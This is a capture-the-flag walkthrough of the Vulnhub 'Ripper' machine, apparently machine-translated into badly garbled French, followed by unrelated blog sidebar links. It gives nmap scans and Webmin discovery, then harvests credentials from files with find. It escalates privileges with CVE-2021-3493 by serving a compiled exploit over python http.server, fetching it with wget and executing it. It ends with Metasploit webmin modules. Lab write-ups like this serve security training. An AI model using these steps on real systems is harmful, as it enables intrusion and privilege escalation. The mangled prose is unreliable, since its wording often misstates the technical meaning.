当前位置:网站首页>Ripper of vulnhub
Ripper of vulnhub
2022-07-03 11:47:00 【May... Fleurs Vii.】
Table des matières
2.、Sonde de version de service
Quatre、Fuite d'information du système interne
1.Télécharger l'exécution de la compilation
Sept、 Droit de revendication normal
2. TrouvercubesDocuments connexes
Un.、nmapScan Survival Host
1.Scan semi - ouvert
nmap -sS ip
2.Balayage ouvert complet
nmap -sT ip
3.Basé surpingScan de
nmap -sP ip
4.Basé surarpScan de
nmap -PR ip
5.AucunepingScan
nmap -PN 192.168.152.130
2.、Sonde de version de service
22,80 Ou deux services communs ,10000Le port est ouvert.webmin
Webmin Est la base la plus puissante WebDeUnixOutils de gestion du système. Accès de l'Administrateur via le Navigateur Webmin Diverses fonctions de gestion et mesures de gestion correspondantes .WebminSoutenir la grande majorité desUnixSystème, Ces systèmes, à l'exception de toutes les versions linuxEn plus de:AIX、HPUX、Solaris、Unixware、IrixEtFreeBSDAttendez..

Trois、Collecte d'informations
80 Le port n'a aucune information utile pour franchir la frontière.
Mais dans10000 On en a trouvé un. webminBoîte de connexion pour
1.webminBoîte de connexion pour
2.robots.txtDocumentation

3.Essayer de déchiffrer
we scan php codes with rips

4.rips
RIPS Est un bon outil d'analyse de code source statique , Utilisé principalement pour creuser PHP Vulnérabilité du programme . Et c'est un webInterface,Accès àripsCommencez à utiliser. Essayer d'accéder .
En fin de compte,80 On a vu ça sous le port. rips

Quatre、Fuite d'information du système interne

Cinq、sshConnexion
Essayez de vous connecter ici webmin Pas en coulisses. .Essayer d'utilisersshConnexion réussie,

Six、0dayDroit de rétractation
Parce qu'après le lancement de cette cible, ,unbuntu Il y a une faille dans les droits. .Pour que nous puissions utiliser directement.
Numéro de vulnérabilité:cve-2021-3493

1.Télécharger l'exécution de la compilation
L'hôte cible n'a pas d'environnement de compilation ,Précompilé
gcc exploit.c -o exp
OuverthttpServices
python3 -m http.server 80
Télécharger
wget http://192.168.0.106/exp
Droit de donner
chmod 777 exp
Mise en œuvre
./exp

Sept、 Droit de revendication normal
1. firefox
J'ai vu un autre navigateur Firefox. , Ça ne sert à rien. .

2. TrouvercubesDocuments connexes
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null
Cet ordre{} Est utilisé pour recevoir les résultats
C'est pour s'échapper. ;De
Après une recherche, J'ai un code. ,Je suppose quecubesDe
3.suOui.cubes

4.findRecherche
Recherche etcubesQuestions connexes, Et filtrer ce qui est inutile
find / -user cubes -type f -exec ls -al {} \; 2>/dev/null |grep -v "proc"
Nous l'avons trouvé dans le fichier journal adminNuméro de compte, mot de passe

5.ConnexionwebminBackground
Parce qu'on a le numéro de compte de l'Administrateur. ,Encore parce quewebminC'est le contrôle.linuxTerminalweb‘Application’, Donc vous avez les permissions les plus élevées depuis que vous vous êtes connecté .

Huit、msf
Je suis juste venu me familiariser avec l'utilisation. ,Parce quemsfDerce Le module nécessite également un mot de passe de compte , Mais avec le compte et le mot de passe, nous pouvons obtenir l'autorisation de l'Administrateur directement.
msfconsole
search webmin
use 2
show options
Définir les paramètres
C'est là que ça doit être réglé.
set ssl true

边栏推荐
- Spl06-007 air pressure sensor (example of barometer)
- R language uses grid of gridextra package The array function combines multiple visual images of the ggplot2 package horizontally, and the ncol parameter defines the number of columns of the combined g
- Software testing weekly (issue 78): the more confident you are about the future, the more patient you are about the present.
- Nestjs configuration service, configuring cookies and sessions
- Redis things
- Some common terms
- Kibana - installation and configuration of kibana
- 一些常用术语
- Keepalived中Master和Backup角色选举策略
- 优化接口性能
猜你喜欢

Viewing binary bin files with notepad++ editor

FL Studio 20无限试用版水果编曲下载

ASP.NET-酒店管理系統

鸿蒙第三次培训(项目实训)

Excel quick cross table copy and paste

Software testing weekly (issue 78): the more confident you are about the future, the more patient you are about the present.

《剑指offer 03》数组中重复的数字

多维度监控:智能监控的数据基础

(数据库提权——Redis)Redis未授权访问漏洞总结

Slam mapping and autonomous navigation simulation based on turnlebot3
随机推荐
C language AES encryption and decryption
Kibana~Kibana的安装和配置
How to get started embedded future development direction of embedded
Key switch: press FN when pressing F1-F12
多维度监控:智能监控的数据基础
小鹏 P7 撞护栏安全气囊未弹出,官方回应称撞击力度未达到弹出要求
用了这么久线程池,你真的知道如何合理配置线程数吗?
Mysql根据时间搜索常用方法整理
GCC compilation process and dynamic link library and static link library
Using onvif protocol to operate the device
DS90UB949
uniapp实现点击加载更多
Capturing and sorting out external Fiddler -- Conversation bar and filter [2]
STL教程9-容器元素深拷贝和浅拷贝问题
Solicitation for JGG special issue: spatio-temporal omics
Some common terms
Dynamic programming (interval DP)
How to make others fear you
按键切换:按F1-F12都需要按Fn
在CoreOS下部署WordPress实例教程